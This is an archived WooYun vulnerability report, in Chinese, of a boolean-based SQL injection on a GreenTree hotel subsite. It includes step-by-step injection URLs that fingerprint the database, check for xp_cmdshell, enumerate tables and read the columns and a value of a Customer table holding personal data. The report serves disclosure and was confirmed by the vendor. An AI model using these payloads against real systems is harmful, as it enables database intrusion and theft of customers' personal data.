当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0136504

漏洞标题:格林豪泰酒店某分站存在SQL注入漏洞

相关厂商:格林豪泰酒店管理集团

漏洞作者: 浮萍

提交时间:2015-08-24 14:17

修复时间:2015-10-10 09:00

公开时间:2015-10-10 09:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-24: 细节已通知厂商并且等待厂商处理中
2015-08-26: 厂商已经确认,细节仅向厂商公开
2015-09-05: 细节向核心白帽子及相关领域专家公开
2015-09-15: 细节向普通白帽子公开
2015-09-25: 细节向实习白帽子公开
2015-10-10: 细节向公众公开

简要描述:

SQL注入
boolean

详细说明:

http://system.greentree.com.cn:8080/frontinvest/roomdetail.aspx?hotelcode=531001

Snap51.jpg


输入'and'1'='1

Snap52.jpg


输入'and'1'='2

Snap53.jpg


查看数据库版本

http://system.greentree.com.cn:8080/frontinvest/roomdetail.aspx
?hotelcode=531001' and 1=(select @@VERSION) and '1'='1


Snap54.jpg


当前数据库名

Snap55.jpg


本地服务名

Snap56.jpg


Snap57.jpg


24个数据库

http://system.greentree.com.cn:8080/frontinvest/roomdetail.aspx
?hotelcode=531001' and 24= (select count(name) from master.dbo.sysdatabases) and '1'='1


Snap60.jpg


XP_CMDSHELL存在

http://system.greentree.com.cn:8080/frontinvest/roomdetail.aspx?
hotelcode=531001' and 1= (Select count(name) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell') and '1'='1


Snap61.jpg


XP_regread扩展存储过程存在

Snap62.jpg


漏洞证明:

爆表

http://system.greentree.com.cn:8080/frontinvest/roomdetail.aspx?
hotelcode=531001' and 1= (select top 1 name from sysobjects where xtype='u' ) and '1'='1


Snap63.jpg


Snap64.jpg


select top 1 name from sysobjects where xtype='u' and name not in('TurnsTable','crscount')
select top 1 name from sysobjects where xtype='u' and name not in('TurnsTable','crscount','blacklist')
select top 1 name from sysobjects where xtype='u' and name not in('TurnsTable','crscount','blacklist','Iccard_Request','m_initrebate','Customer')


一共672张表
这里就不再一一列出了

http://system.greentree.com.cn:8080/frontinvest/roomdetail.aspx?
hotelcode=531001' and 672= ( select count(name) from sysobjects where xtype='u') and '1'='1


Snap65.jpg


看表字段
这里以Customer为例
39个字段

Snap66.jpg


如下:

CustomerCode
FirstName
LastName
MiddleName
NickName
Gender
Birthday
NationalityID
Race
Title
Language1
Language2
CustomerTypeID
TravelAgentID
CustomerOrigin
Region1
Region2
Note1
Note2
Company
Address
Telephone
Zip
VisaID
ExpirationDate
IDTypeID
IDNumber
VIPLevel
VIPNumber
CreateDate
UploadFlag
Priority
Mobile
CompanyTel
CompanyFax
MemberType
MemberNo
UploadDate
HotelCode


看一个字段

http://system.greentree.com.cn:8080/frontinvest/roomdetail.aspx
?hotelcode=531001' and 1= (select top 1  FirstName from Customer) and '1'='1


Snap67.jpg


修复方案:

版权声明:转载请注明来源 浮萍@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-08-26 08:58

厂商回复:

感谢对格林的关注,已处理。。。

最新状态:

暂无

漏洞评价:

评论

  1. 2015-08-24 15:47 | BeenQuiver ( 普通白帽子 | Rank:101 漏洞数:26 | 专注而高效,坚持好的习惯千万不要放弃)

    卧槽,又重了。fuck

  2. 2015-08-24 15:48 | 浮萍 ( 普通白帽子 | Rank:555 漏洞数:118 | 默默潜水)

    @BeenQuiver 我上午才提交。。

  3. 2015-08-26 09:46 | 刺刺 ( 普通白帽子 | Rank:603 漏洞数:52 | 真正的安全并不是技术,而是人类善良的心灵...)

    刷泛微OA的大牛……

  4. 2015-08-26 10:11 | 浮萍 ( 普通白帽子 | Rank:555 漏洞数:118 | 默默潜水)

    @刺刺 被你发现了 这个不是oa